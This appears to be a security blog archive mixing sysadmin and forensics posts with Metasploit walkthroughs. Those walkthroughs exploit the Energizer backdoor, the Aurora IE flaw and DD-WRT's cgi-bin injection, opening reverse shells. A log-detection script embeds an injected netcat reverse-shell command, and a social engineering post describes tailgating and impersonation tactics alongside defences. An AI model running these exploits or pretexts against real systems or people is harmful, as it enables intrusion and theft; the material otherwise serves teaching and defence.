Wednesday, 10 March 2010
How To Exploit the Energizer Trojan
# msfconsole
msf > use auxiliary/scanner/backdoor/energizer_duo_detect
msf auxiliary(energizer_duo_detect) > set RHOSTS 10.0.0.0/24
msf auxiliary(energizer_duo_detect) > set THREADS 256
msf auxiliary(energizer_duo_detect) > run
[*] 10.0.0.23:7777 FOUND: [["F", "AUTOEXEC.BAT"] .......
To take things a step further and gain access to a system running this backdoor, use the energizer_duo_payload module:
msf > use exploit/windows/backdoor/energizer_duo_payload
msf exploit(energizer_duo_payload) > set RHOST 10.0.0.23
msf exploit(energizer_duo_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(energizer_duo_payload) > set LHOST 10.0.0.253
msf exploit(energizer_duo_payload) > exploit
[*] Started reverse handler on 10.0.0.253:4444
[*] Trying to upload C:\NTL0ZTL4DhVL.exe...
[*] Trying to execute C:\NTL0ZTL4DhVL.exe...
[*] Sending stage (747008 bytes)
[*] Meterpreter session 1 opened (10.0.0.253:4444 -> 10.0.0.23:1200)
meterpreter > getuid
Server username: HACKME\TestUser
Wednesday, 20 January 2010
Reproducing the "Aurora" IE Exploit
msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST 192.168.0.151
msf exploit(ie_aurora) > set URIPATH /
msf exploit(ie_aurora) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on port 4444
[*] Local IP: http://192.168.0.151:8080/
[*] Server started.
msf exploit(ie_aurora) >
Open Internet Explorer on a vulnerable machine (we tested Windows XP SP3 with IE 6) and enter the Local IP URL into the browser. If the exploit succeeds, you should see a new session in the Metasploit Console:
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514)
msf exploit(ie_aurora) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: WINXP\Developer
meterpreter > use espia
Loading extension espia...success.
meterpreter > screenshot aurora.bmp

meterpreter > shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Developer\Desktop>
Monday, 2 November 2009
Dual Boot Windows XP and BackTrack with Encryption
Before starting you may want to wipe your entire hard drive.
- dd if=/dev/urandom of=/dev/hda
BackTrack /boot partition (not encrypted)
BackTrack / partition encrypted
Install Windows XP first (200GB)
Boot off the BackTrack 4 CD and partition the disk with fdisk /dev/hda: create a /boot partition (hda2) of 200MB and a / partition (hda3) using the remainder of the disk. Then set up the encrypted partition; "root" is the name the opened LUKS device gets under /dev/mapper:
- modprobe aes-i586
- cryptsetup luksFormat /dev/hda3
- cryptsetup luksOpen /dev/hda3 root
- mkfs.ext3 -j /dev/mapper/root
Do not pass -O extent here: extents are an ext4 feature and the ext3 driver refuses to mount a filesystem that has them enabled, which would break the fstab entry below.
Run the BT installer and select /dev/mapper/root to be mounted as / and /dev/hda2 as /boot. Make sure you check the format box for /dev/mapper/root
Do not reboot just yet, we need to modify a few files first.
- mkdir /mnt/root
- mount /dev/mapper/root /mnt/root
- mount /dev/hda2 /mnt/root/boot
- chroot /mnt/root
- mount -t proc proc /proc
- mount -t sysfs sys /sys
Next we need to edit /etc/crypttab. I'm going to keep the name root for the / device:
- root /dev/hda3 none luks
Next step is to edit /etc/fstab. The entries for / and /boot should look like this; amend if needed.
- /dev/mapper/root / ext3 relatime,errors=remount-ro 0 1
- /dev/hda2 /boot ext3 defaults 0 0
Next step is to add a few modules to the kernel.
Edit /etc/initramfs-tools/modules file and add the following to the end of the file.
aes-i586
sha256
dm-mod
dm-crypt
Update your initrd with the following command.
- update-initramfs -k all -c
Now time to fix grub.
- cd /boot/grub/
- nano menu.lst
Your BackTrack section should look like this.
- title BackTrack 4
- uuid (the UUID of your /boot partition)
- kernel /vmlinuz-2.6.29.4 root=/dev/mapper/root ro quiet
- initrd /initrd.img-2.6.29.4
Then install GRUB to the MBR:
- grub-install /dev/hda
Using TrueCrypt 6.3 I fully encrypted the Windows system partition (not full disk encryption) and let it write its bootloader to the MBR. This overwrites GRUB.
Don't worry, we'll fix this later.
Boot with the BackTrack CD, mount the /boot partition (hda2 in my case) on /mnt/boot, and copy the TrueCrypt bootloader from the MBR to a file on it.
I used these commands to do so:
- dd if=/dev/hda of=/mnt/boot/truecrypt.mbr count=1 bs=512
- dd if=/dev/hda of=/mnt/boot/truecrypt.backup count=8 bs=32256
Reinstall GRUB to the MBR from the grub shell rather than with grub-install: grub-install embeds stage1.5 in the sectors that follow the MBR, which is where the rest of the TrueCrypt loader lives, whereas the install command below writes only stage1 to the MBR and points it straight at stage2 on the /boot partition:
- sudo grub
- install (hd0,1)/grub/stage1 (hd0) (hd0,1)/grub/stage2 0x8000 p
Finally add an entry for Windows to menu.lst that chainloads the saved TrueCrypt boot sector:
title XP
rootnoverify (hd0,0)
makeactive
chainloader (hd0,1)/truecrypt.mbr
boot
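Before adding the chainloader entry it is worth checking that the file saved with dd really is one complete boot sector, since a short or unsigned file will simply fail to chainload. The script below is an added example written for this post, not part of the original procedure: mbr_check verifies the size and the 0x55AA signature, mbr_partition decodes the primary partition table so you can compare it against fdisk, and make_sample_mbr builds a constructed 512-byte sample (one bootable type-0x07 entry at LBA 63) so the checks can be run without a real disk. The path /mnt/boot/truecrypt.mbr is the one used above; everything else is an assumption.

```sh
#!/bin/sh
# Sanity checks for a boot sector saved with "dd ... count=1 bs=512" before it
# is chainloaded from GRUB. Added example code, not from the original post.

# Succeed only if the file is exactly one 512-byte sector ending in 55 AA.
mbr_check() {
    f="$1"
    size=$(wc -c < "$f" | tr -d ' ')
    if [ "$size" -ne 512 ]; then
        echo "$f: $size bytes, expected exactly 512" >&2
        return 1
    fi
    sig=$(dd if="$f" bs=1 skip=510 count=2 2>/dev/null | od -An -tx1 | tr -d ' \n')
    if [ "$sig" != "55aa" ]; then
        echo "$f: boot signature is '$sig', expected 55aa" >&2
        return 1
    fi
    return 0
}

# Convert 8 hex characters holding a little-endian 32-bit value to decimal.
le32() {
    h="$1"
    b0=$(printf '%s\n' "$h" | cut -c1-2); b1=$(printf '%s\n' "$h" | cut -c3-4)
    b2=$(printf '%s\n' "$h" | cut -c5-6); b3=$(printf '%s\n' "$h" | cut -c7-8)
    echo $((0x$b3$b2$b1$b0))
}

# Decode primary partition entry N (0-3) of the table at offset 446 and print
# "status type start_lba sector_count" so it can be compared with fdisk output.
mbr_partition() {
    entry=$(dd if="$1" bs=1 skip=$((446 + $2 * 16)) count=16 2>/dev/null \
            | od -An -tx1 | tr -d ' \n')
    status=$(printf '%s\n' "$entry" | cut -c1-2)
    ptype=$(printf '%s\n' "$entry" | cut -c9-10)
    start=$(le32 "$(printf '%s\n' "$entry" | cut -c17-24)")
    count=$(le32 "$(printf '%s\n' "$entry" | cut -c25-32)")
    echo "$status $ptype $start $count"
}

# Write one byte (given as an octal printf escape) at a byte offset.
put_byte() { printf "$3" | dd of="$1" bs=1 seek="$2" conv=notrunc 2>/dev/null; }

# Constructed sample sector (an assumption, not a dump of a real disk): entry 0
# is bootable, type 0x07, starts at LBA 63 and spans 409600 sectors.
make_sample_mbr() {
    out="$1"
    dd if=/dev/zero of="$out" bs=512 count=1 2>/dev/null
    put_byte "$out" 446 '\200'   # status 0x80: bootable
    put_byte "$out" 450 '\007'   # type 0x07
    put_byte "$out" 454 '\077'   # start LBA 63, little-endian low byte
    put_byte "$out" 459 '\100'   # sector count 0x00064000 = 409600
    put_byte "$out" 460 '\006'
    put_byte "$out" 510 '\125'   # boot signature 55 AA
    put_byte "$out" 511 '\252'
}

# Usage on the real file:
#   mbr_check /mnt/boot/truecrypt.mbr && mbr_partition /mnt/boot/truecrypt.mbr 0
```

The partition table printed for the saved sector should match what fdisk shows for /dev/hda, because the TrueCrypt loader keeps the original table in its MBR; a mismatch means the wrong sector was saved.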
Monday, 21 September 2009
Dell R900 SQL Server 2005 Fails To Install
Microsoft has confirmed that on a computer with a multicore processor, if the ratio of logical processors to physical sockets is not a power of 2, you cannot install SQL Server 2005. SQL Server 2005 Service Pack 2 and later fix this, but it is not possible to slipstream a service pack into the SQL Server 2005 install CD/DVD. A quick workaround is to edit boot.ini and add /NUMPROC=1 to the boot options, so Windows presents a single processor while you install.
Install SQL Server 2005.
Install SQL Server 2005 Service Pack 3
Remove the /NUMPROC=1 from boot.ini and reboot.
SQL will now see all processors.
Thursday, 13 August 2009
SSD Drives and IT Forensics - Update
1. What are the implications of having this included in the firmware of SSD drives and how would you acquire such a drive?
The implications are wide ranging, but essentially the volume of recoverable data may be reduced (forensic analysis of deleted items, system artefacts, etc. may not be possible). However, acquisition methods will not be affected.
2. Does the firmware start clearing sectors when the drive is simply connected to a power supply, or does it require other hardware to be attached?
3. If it starts clearing sectors when connected to a power supply, what legal implications will this have if, during the acquisition of the drive, potential evidence is being deleted by the built-in firmware before it can be forensically acquired?
No, the firmware does not clear sectors when powered up. It requires an operating system that supports the TRIM command. OCZ SSDs now have the ability to use TRIM under Windows 7, Linux and OS X, but only where the operating system, firmware and associated software are correctly installed.
4. Are "live" acquisitions still possible with SSD drives with this firmware if we want to consider them forensically sound images? For example, creating a logical evidence file of an open encrypted container file.
Yes, see above: as TRIM is not supported under the Linux kernel (and would never be supported in a forensic distribution) there will be no loss of data during forensic acquisition.
The only potential issue would be a live acquisition under an operating system that does support TRIM (potentially Windows 7).
Wednesday, 12 August 2009
The implication of new firmware released for OCZ SSD on computer forensics
On my daily trawl through various feeds (thanks, Google Reader, for making this so easy) I came across an article that discussed the "benefits" of this new firmware. While I tend to agree with the writer from a performance standpoint, the IT forensics voice in my head was saying this could make my job more interesting.
This firmware is designed to keep the speed of the SSD as close as possible to that of a new drive even after it has been used over a long period of time. The flash memory used on an SSD is made up of cells that usually contain 4KB pages, arranged in blocks of 512KB. When a cell is unused, data can be written to it relatively quickly. But if a cell already contains some data, no matter how little, even if it fills only a single page in the block, the entire block must be rewritten.
This is because a memory cell has to be empty to have data written to it, even if it is only partially filled. The data already in the cell is copied to the cache, the new data is added to the cache, the old data in the cell is erased, and the contents of the cache are written back to the cell. As time passes and all the cells are partially filled with old data, the SSD slows down because every new write has to go through this process.
Basically this means that the way many SSDs write data is not very efficient: it leaves stale data all over the place, which later causes slowdowns when it has to be needlessly rewritten.
Now what the new firmware from OCZ does is apparently fix this while the drive is idle, by regularly clearing used memory cells of unneeded or unwanted data so they are instantly available for future use.
From a forensics perspective, could this be considered a built-in "wiping" function on SSDs? It is also worth noting that this could become the standard for all SSDs.
This raises the following questions:
1. What are the implications of having this included in the firmware of SSD drives and how would you acquire such a drive?
2. Does the firmware start clearing sectors when the drive is simply connected to a power supply, or does it require other hardware to be attached?
3. If it starts clearing sectors when connected to a power supply, what legal implications will this have if, during the acquisition of the drive, potential evidence is being deleted by the built-in firmware before it can be forensically acquired?
4. Are "live" acquisitions still possible with SSD drives with this firmware if we want to consider them forensically sound images? For example, creating a logical evidence file of an open encrypted container file.
I would be interested in reading comments from anyone who has tested this or even theories on dealing with this in the wild.
UPDATE - Questions answered
Monday, 10 August 2009
Root on HTC Magic
1 Click Android Rooting ...
http://androidandme.com/2009/08/news/how-to-root-a-t-mobile-g1-and-mytouch-3g-android-phone/
I recently got a HTC Magic on Vodafone UK and decided that it was about time I got root on it.
Murphy's law states that anything that can go wrong will go wrong. Step 1 is always make sure you have a backup.
I downloaded the files from The Unlockr's Guide to getting root on HTC Magic. Since my phone is a Vodafone UK version I downloaded the 32B files.
After extracting the SDK to C:\AndroidSDK\ and the images to C:\AndroidSDK\tools,
I booted my phone into fastboot mode: Power on phone with the "Back" arrow held down.
Connect the USB cable, open a command prompt and run the following from your AndroidSDK\tools folder:
fastboot boot recovery-new.img
Your phone will reboot and you will be presented with the Android System Recovery menu.
Choose the "Nandroid Backup 2.1" option. After 2-5 minutes, backups of your phone's system, boot, recovery, data, misc and cache images will have been copied to the phone's SD card.
I then followed The Unlockr's Guide. Unfortunately this didn't work for me and my phone just hung at the Vodafone splash screen. I left it for about 20 minutes thinking that maybe it was doing some post-load installs, but no, not that lucky. Thinking that I may have just bricked my phone was not a happy feeling. Just as well I remembered Murphy and his laws. Now the next question: how do I get the backup back onto my phone? I tried to re-flash it by first wiping the failed flash:
fastboot erase system -w
fastboot erase boot
fastboot flash system system.img
fastboot flash boot boot.img
fastboot flash recovery recovery.img
fastboot reboot
No such luck, all the fastboot flash commands returned the same error:
FAILED (remote: signature verify fail)
Browsing through the xda-developers forum I came across the following post by Amon_RA that had a modified version of the HTC Magic recovery image.
I downloaded this and extracted it to c:\AndroidSDK\tools
So booting into fastboot mode again, opening a command prompt and running the following from C:\AndroidSDK\tools
fastboot boot recovery-RAv1.2.0G.img
The phone will boot the recovery image and you will notice an option titled
Nandroid V2.2 Restore
Selecting this option started the restore process. 5 minutes later my phone was fully working again. I guess I'll be waiting a bit longer for a working "root" image.
Monday, 3 August 2009
Slipstream or integrate Office 2007 Service Pack 2 (SP2)
Download the standalone installer office2007sp2-kb953195-fullfile-en-us.exe to a temporary folder (c:\tmp)
Create folder called Updates (C:\Updates)
Open a command line window (CMD) and type the following on one line:
c:\tmp\office2007sp2-kb953195-fullfile-en-us.exe /extract:C:\Updates
Agree to the EULA and then close the Installer when completed.
Move the contents of the C:\Updates folder to the Updates folder in your Office 2007 install folder structure.
Enabling AHCI after installing Windows XP x64
Open Device Manager
under IDE ATA/ATAPI controllers you should see something like : Intel ICH9 Serial ATA Storage Controller.
Right-Click on that and select Update Driver
Say no to connecting to Windows Update to search, hit Next
Select Install from a list or specific location (Advanced), hit Next
Select "Don't search. I will choose the driver to install", hit Next
Select Have Disk
Browse to the driver folder (c:\tmp\), highlight the iastor.inf file, hit Open, then OK
Now you should have a list of controllers ICH9 /AHCI driver
You'll get warned that installing the device driver is not recommended, click Yes to continue installing
Click Finish
If you have more than one Intel ICH9 Serial ATA Storage Controller you will need to do this for each before restarting
When the system boots, enter the BIOS, navigate to the SATA Operation option (or equivalent) and set it to AHCI.
Verify your SATA ports are enabled, save changes and exit.
After you log into Windows, your computer will find the "new" hardware. Wait until you get the popup message to restart your computer, say Yes to restart one last time.
Sunday, 26 July 2009
Exploiting the cgi-bin vulnerability in dd-wrt
msf exploit(handler) > use exploit/linux/http/ddwrt_cgibin_exec
msf exploit(ddwrt_cgibin_exec) > set PAYLOAD cmd/unix/reverse_netcat
PAYLOAD => cmd/unix/reverse_netcat
msf exploit(ddwrt_cgibin_exec) > set LPORT 4444
LPORT => 4444
msf exploit(ddwrt_cgibin_exec) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf exploit(ddwrt_cgibin_exec) > set LHOST 192.168.1.12
LHOST => 192.168.1.12
msf exploit(ddwrt_cgibin_exec) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Sending GET request with encoded command line...
[*] Command shell session 2 opened (192.168.1.12:4444 -> 192.168.1.1:4312)
uname -a
Linux DD-WRTx86CI 2.6.19.2dd-wrt #45 Fri Jan 26 06:28:01 CET 2007 i686 unknown
DD-WRT httpd vulnerability
As reported at www.milw0rm.com, there is a vulnerability in the HTTP server of the DD-WRT management GUI that can be used to execute commands and gain control over the router: anything placed after a ";" in a /cgi-bin/ request URL is passed to a shell, as the /cgi-bin/;reboot test below shows.
Note: the exploit can only be used directly from outside your network over the internet if you have enabled remote Web GUI management in the Administration tab. As an immediate action, disable remote Web GUI management. That limitation can however be bypassed with Cross-Site Request Forgery (CSRF), where a malicious website makes a browser inside the network send the exploit request to the router.
The guys over at dd-wrt have fixed the issue and generated new builds of the latest DD-WRT version. The files can be downloaded temporarily from the location linked in the original announcement until the router database is updated.
[UPDATE] The guys over at dd-wrt have integrated most of the fixed build files into the router database. Check there whether files for build 12533 are available for your router. If not (yet), use the location mentioned above to obtain the files.
The exploit can also be stopped with a firewall rule. Go to your router's admin interface > Administration > Commands and enter the following text:
insmod ipt_webstr
ln -s /dev/null /tmp/exec.tmp
iptables -D INPUT -p tcp -m tcp -m webstr --url cgi-bin -j REJECT --reject-with tcp-reset
iptables -I INPUT -p tcp -m tcp -m webstr --url cgi-bin -j REJECT --reject-with tcp-reset
Press "Save Firewall" and reboot your router. This rule blocks any attempt to access a URL containing "cgi-bin". You can verify that the rule is working by entering http://192.168.1.1/cgi-bin/;reboot in your browser, which should give a "Connection was reset" error (Firefox).
Important note: this only works for non-HTTPS requests, because the webstr match cannot see inside TLS. If you have HTTPS Management turned on under Administration > Management > Remote Access, turn it off. If you don't want to turn it off, your only option is to update.
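The firewall rule above stops the request but records nothing, so it is useful to be able to tell from web-server logs whether the injection was attempted and what command was sent. The script below is an added example written for this post, not code from dd-wrt or the advisory: it reads access-log lines in common log format, picks out requests whose path has a shell separator (a literal ";" or its %3B encoding) directly after /cgi-bin/, and prints the client IP together with the URL-decoded command. The four log lines are constructed samples, and the assumption that such a log exists (DD-WRT's own httpd may not write one; a proxy or lab instance in front of it would) is mine.

```sh
#!/bin/sh
# Detection for the DD-WRT /cgi-bin/ command injection over HTTP access logs.
# Added example, not part of the original advisory. Sample log lines are
# constructed, not captured from a real router.
SAMPLE_LOG='192.168.1.12 - - [26/Jul/2009:10:01:02 +0100] "GET / HTTP/1.1" 200 4120
192.168.1.12 - - [26/Jul/2009:10:01:05 +0100] "GET /cgi-bin/;reboot HTTP/1.1" 200 0
203.0.113.5 - - [26/Jul/2009:10:02:17 +0100] "GET /cgi-bin/%3Bnc%20203.0.113.5%204444%20-e%20/bin/sh HTTP/1.1" 200 0
192.168.1.12 - - [26/Jul/2009:10:03:00 +0100] "GET /cgi-bin/status.cgi HTTP/1.1" 404 0'

# Read common-log-format lines on stdin. For every request whose path puts a
# shell separator right after /cgi-bin/ (the shape the exploit uses), print
# "client-ip decoded-command". Legitimate /cgi-bin/name.cgi requests are ignored.
ddwrt_cgibin_hits() {
    awk '
    function hexval(c) { return index("0123456789abcdef", tolower(c)) - 1 }
    # Minimal percent-decoder so the logged command reads as the router ran it.
    function urldecode(s,    out, c) {
        out = ""
        while (s != "") {
            c = substr(s, 1, 1)
            if (c == "%" && length(s) >= 3) {
                out = out sprintf("%c", hexval(substr(s, 2, 1)) * 16 + hexval(substr(s, 3, 1)))
                s = substr(s, 4)
            } else {
                out = out c
                s = substr(s, 2)
            }
        }
        return out
    }
    {
        path = $7                      # request path in "METHOD path HTTP/x.y"
        if (tolower(path) ~ /^\/cgi-bin\/(;|%3b)/) {
            cmd = urldecode(substr(path, length("/cgi-bin/") + 1))
            sub(/^;/, "", cmd)         # drop the separator itself
            print $1 " " cmd
        }
    }'
}

# Usage: printf '%s\n' "$SAMPLE_LOG" | ddwrt_cgibin_hits
```

Requests that arrive over HTTPS management are not visible to the firewall rule, but they are still visible to this check as long as the server itself logs them, which is one reason to keep logging on even after the rule is in place.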
Friday, 15 May 2009
Disable System Beep In VMWare
Add the following line to the .vmx file for that vmware machine.
mks.noBeep = "TRUE"
Friday, 1 May 2009
Forensics and Disk Encryption
The challenges for the computer forensics investigator have increased over the past few years.
Companies are deploying disk and volume based encryption systems. The traditional method of "pull the plug" and then forensically image the hard drive is changing.
Before powering down a computer, consider the potential of encryption software being installed on the computer or as part of the operating system. If present, appropriate forensic methods should be utilised to capture the encrypted data before the computer is powered down.
There are essentially two competing solutions
- Gather the “best” evidence available
- Allow the system to continue operation in an unhindered manner
With encrypted drives becoming more common in the corporate environment, this means that without the cooperation of the suspect, or a master key / password supplied by the IT department, the data is essentially unreadable.
The ACPO Good Practice Guide for Computer based Electronic Evidence (v3) gives no guidance on the collection of encrypted hard drives. Similarly the US Secret Service Best Practices for Seizing Electronic Evidence (v3) makes no mention of encrypted hard drives either.
Identifying encrypted disks
It depends on how the encryption works. You may want to look for the following:
icons in the taskbar
start menu entries
common filenames and paths (Pointsec, SafeGuard Easy, DriveCrypt, PC Guardian)
the MBR: most disk encryption products use pre-boot authentication and replace the boot code (for example SafeGuard)
mounted devices in the registry, a good way to detect volume encryption (for example TrueCrypt)
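Where none of those artefacts are visible, the raw data itself can be tested. The script below is an added example written for this post, not part of the original: has_luks_magic looks for the fixed six-byte signature a LUKS volume carries at offset 0, and byte_entropy computes Shannon entropy over whatever bytes it is fed, because a TrueCrypt volume or container deliberately carries no magic and the only signal is that its contents look random. The 7.9 bits-per-byte threshold and the idea of sampling only the first few megabytes of a device are my assumptions; compressed or already-random data will also score high, so treat the result as a prompt to look harder, not as proof of encryption.

```sh
#!/bin/sh
# Two checks for spotting an encrypted volume in a device or image.
# Added example code, not from the original post.

# Shannon entropy in bits per byte of the data on stdin (max 8.000).
# Feed it a sample, e.g.:  dd if=/dev/sda3 bs=1M count=4 2>/dev/null | byte_entropy
byte_entropy() {
    od -An -v -tu1 | awk '
        { for (i = 1; i <= NF; i++) { count[$i]++; n++ } }
        END {
            h = 0
            for (b in count) { p = count[b] / n; h -= p * log(p) / log(2) }
            printf "%.3f\n", h
        }'
}

# True if the first six bytes are the LUKS header magic: "LUKS" 0xBA 0xBE.
has_luks_magic() {
    [ "$(od -An -tx1 -N6 "$1" | tr -d ' \n')" = "4c554b53babe" ]
}

# Classify a file or device as "luks", "high-entropy" (possibly encrypted or
# compressed; the 7.9 threshold is an assumption) or "plaintext".
classify_volume() {
    f="$1"
    if has_luks_magic "$f"; then
        echo luks
        return
    fi
    e=$(byte_entropy < "$f")
    if awk -v e="$e" 'BEGIN { exit !(e > 7.9) }'; then
        echo high-entropy
    else
        echo plaintext
    fi
}

# Usage: classify_volume /dev/sda3
```

On a live Windows box the same entropy test can be run against a suspected container file before deciding whether a logical evidence file of the mounted volume is needed, which ties into the live imaging steps below.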
Prerequisites for live imaging
Document everything you do. Document everything you ask a trusted system administrator / information security person to do. In order to image a live system you need to be logged on as a local admin level user. The end result is the need to gather an evidential copy of a system.
A physical disk image may not be the best evidence as the data may be unreadable. Live acquisition enables the investigator to gather volatile information such as memory, process list, network connections, open files etc.
What is live imaging
Taking a copy of a system while that system is still functioning in a live environment
Why would you image a live machine ?
Business critical systems that cannot be shut down. Shutting down systems may create legal liability for examiners through:
damaging equipment
unintentional data loss
hampering operations
Instructions that evidence gathering must be conducted using the least intrusive methods available.
Encrypted volumes
Tools
Helix (dd/netcat)
Prodiscover IR
Encase EEE/FIM
FTK
Issues surrounding imaging a live system.
The system is essentially “un-trusted”. This raises the following questions. How do we know we have collected all the original evidence on an un-trusted system? Can the machine be accessed remotely? Rootkits ?
Some options available for forensic imaging of encrypted drives.
Non Live Image
Microsoft Windows system
Capture live data: memory dump, current network connections, open files, running processes. Shut down the machine normally. Pulling the plug may cause data loss on encrypted drives.
Remove the drive
Image the drive using a forensic disk cloner such as a SOLO
Option 1
Single capture using two drives. Target and Backup
Bag & Tag the original
Bag & Tag the target
Boot suspect machine using the backup and admin level credentials
Live image of the machine
Option 2
DD capture using two drives
Bag & Tag the original
Bag & Tag the target
Restore backup dd image to a “restore drive”
Option 2A
Boot suspect machine using the “restore drive” and admin level credentials
Live image of the machine
Option 2B
Mount restore drive in VMware
Boot suspect machine using the "restore drive" and admin level credentials
Live image of the machine
Image the drive with encase then follow Option 2A or Option 2B
Live Image
Microsoft Windows system
Capture live data, memory dump, current network connections, open files , running processes
Disconnect from network both wired and wireless.
Run ftkimager from a trusted cd or usb drive (having noted the serial number and other identifying features so it can be recognised in the registry if required at a later date).
Create a logical evidence file of each logical drive on a external usb hard drive (having noted the serial number and other identifying features so it can be recognised in the registry if required at a later date) ensuring you hash the drive contents.
Create a backup copy of the logical evidence files on another drive.
You may also create the two copies at the same time by connecting the two drives to the suspect machine.
Verify both target and backup images.
Thursday, 23 April 2009
Backtrack 4 Beta and Nessus 4.0.0
Download the following linux packages from the nessus website.
Nessus-4.0.0-ubuntu804_i386.deb
NessusClient-4.0.0-ubuntu804_i386.deb
You will also need to register in order to obtain the activation key.
Before installing we will need to install some missing dependencies
apt-get install libqt4-core libqt4-gui libqtcore4 libqt4-network libqt4-script libqt4-xml libqt4-dbus libqt4-test libqtgui4 libqt4-svg libqt4-opengl libqt4-designer libqt4-assistant
Install the server.
# dpkg -i Nessus-4.0.0-ubuntu804_i386.deb
Configure the certificate
# /opt/nessus/sbin/nessus-mkcert
Add the admin user
# /opt/nessus/sbin/nessus-adduser
# /opt/nessus/bin/nessus-fetch --register 'your_registration_key'
# dpkg -i NessusClient-4.0.0-ubuntu804_i386.deb
# /etc/init.d/nessusd start
And start the client from Menu > Internet > NessusClient, or use the CLI.
Wednesday, 22 April 2009
Social Engineering Investigations
One thing you need to be aware of is that social engineering is not just limited to IT systems; it is an issue for the entire organisation.
Social engineering attacks can vary from low tech to high tech.
There are many factors that can lead to a successful social engineering attack.
Normally an attacker would first take a look at the company website as these are normally filled with lots of useful information, such as the names, positions and phone numbers of staff.
Organisations need to be aware of just how much information they are giving away on their websites.
It's also common practice in organisations that a user's email address will be the same as their network user name. The password for email may also be the same as the network logon; this is normally true where an organisation is using Microsoft Exchange.
Armed with this information an attacker may call the help desk posing as someone in a senior position in the organisation asking for "help" on how to connect to the network from home. Help desk staff have been surprisingly helpful to me in the past when I have attempted this type of attack.
An attacker may also pose as a sales rep, as an employee of an IT related magazine or journal, or even as someone seeking employment, and ask to speak to the help desk / IT department. When connected they would ask a series of questions relating to the computer systems in place, such as operating systems (Windows, Apple Macs, Linux / Unix), network infrastructure, wireless, remote access, web based email etc.
This information can help an attacker target specific areas of the network, such as wireless access points or remote access systems.
Also organisations will typically have large bins outside the premises, around the back, near the car park, basement level etc. Since the bins are collected and / or emptied by third parties access to them is rarely restricted.
The amount of information that can be recovered from looking through a company's rubbish can be very rewarding: customer records, employee records, financial statements and other sensitive company data. This style of attack is commonly known as "dumpster diving".
These points would typically be the first steps, as the attacker never has to enter the building to gain access to sensitive information about the organisation. This raises an interesting question: since people are volunteering the information, has the attacker broken any laws? Also, if the bins are in a publicly accessible / shared area, has the attacker broken any laws by "dumpster diving"?
An attacker could also just walk in the front door, past security and reception staff. Mornings and lunchtimes are always a good time to attempt this as there is a constant flow of people leaving and going in to the building.
Other common entry points would be via the car park. But by far the best way in is with the smokers. The attacker will hang around outside and start chatting to other smokers and then just walk into the building with them. Once in the building it's easier to move around, because if you're there people assume that you're supposed to be there; after all, you've been seen outside smoking and talking with genuine employees. An attacker may then install keyloggers, covert wireless access points or other bugging devices. Even something as simple as walking up to a printer and taking "your" printout will go unnoticed.
The likelihood of the above attacks being detected is low.
Prevention of some of these types of attacks can also be difficult.
The physical security of the building and its associated property should be monitored by a combination of monitored CCTV and security guards. Bins should be locked and / or held in a secure area until they are collected.
Now for the IT side of things. This is normally shorter, as the trick is to get into the building. The majority of the time sensitive data is not stored on employees' computers or laptops but on servers. These servers are typically kept in locked rooms secured by a physical lock and/or an electronic lock such as a swipe card or proximity card. Access is generally restricted to a few IT staff. If the attacker wanted to gain access to this room for whatever reason, stealing the physical hardware for example, they would first need to find out who has access to the room and then attempt to covertly copy their access card.
Often, if the attacker really needs to access server stored data, it's more efficient to attempt to "hack" into the network from the inside, or even simply find a desk and call the IT department and ask them to reset "your" password.
The attacker may even simply pick up a laptop and walk out.
If the attacker really needs access to the server room they may pose as an engineer from one of the organisation's third party support vendors, or even from the local telecoms company. A little work with some logos downloaded from the vendor's website, a colour printer and a laminator or plastic card printer are all that's needed to add credibility to the attacker's "story" as to why access is needed. Add in a few business cards with the "office" phone number and a work order, and the attacker may even be given unsupervised access to the server room or other sensitive areas of the business such as meeting and conference rooms.
The more high tech attacks are normally phishing style attacks, where an attacker sets up a fake website that looks identical to the organisation's, at a URL that closely matches the organisation's. The attacker will typically focus on the logon page or another page that prompts the user for sensitive information. The end user will typically not know that their details have been "stolen". In the more sophisticated version of this attack the attacker captures the user's data and then relays it to the genuine site for processing: if the details are correct the user is presented with a valid session, if not they get the standard logon failed message, so nothing looks wrong from the user's side.
Now the people side of things is always going to be the hard part to protect yourself from.
Staff will need to be trained on the Do's and Don'ts of both the security surrounding the building and the IT systems.
The help desk staff should be trained to ask specific security questions in order to verify the identity of the user; relying on caller ID or someone's post code, zip code or date of birth is not sufficient. Caller ID is easy to fake and a person's home address is not too difficult to obtain.
Reception staff, PAs and secretaries are your first line of defence against telephone style attacks. These staff members should be trained to filter out the false calls from the genuine. Keep in mind that not all false callers can be stopped here, but they can at least be slowed down.
All employees should be made to feel comfortable to challenge people who they personally do not recognise or any "employee" not displaying a valid id card.
All non-employee visitors to the building should be escorted everywhere.
Visitors should not be given access to the organisations network unless authorised.
Be wary of IP telephones in semi-public areas such as a reception area. These phones are connected to the organisation's internal network and typically have two network ports, so all an attacker needs to do is connect their laptop to the IP phone's second port to get onto the organisation's network. The same applies to wired / wireless internet access for guests: guest internet access should be on a separate network segment or VLAN that is denied access to the corporate LAN.
Do you think you would fall victim to a social engineering attack? Ask yourself the following questions:
Do I know everyone in the building ?
Would I hold an access controlled (swipe / proximity card) door open for someone if they were carrying something?
Would I challenge someone if I could not see their employee id badge ?
Would I lend mine to someone who approached me at the coffee machine if they said they left theirs in their car ?
Would I let someone in if I saw them chatting to one of the PAs or secretaries?
If someone called me on an internal extension claiming to be from the IT department would I give them my password ?
People are the weak link in the chain here. An attacker will use people's natural willingness to help against them. This is why social engineering attacks work: because they are allowed to work.
Investigating these types of attack.
The fact that you know an attack has taken place is a good start.
How was it detected ?
When was it detected ?
When did the attack take place ?
How was the attack carried out ?
How to investigate this type of attack needs to be handled carefully. The aim really being: "How did someone manage to steal our assets?", be that information or hardware or both.
This would typically start with interviewing any persons identified from the previous questions. One thing to keep in mind is that people will feel embarrassed about coming forward and talking about the "attack".
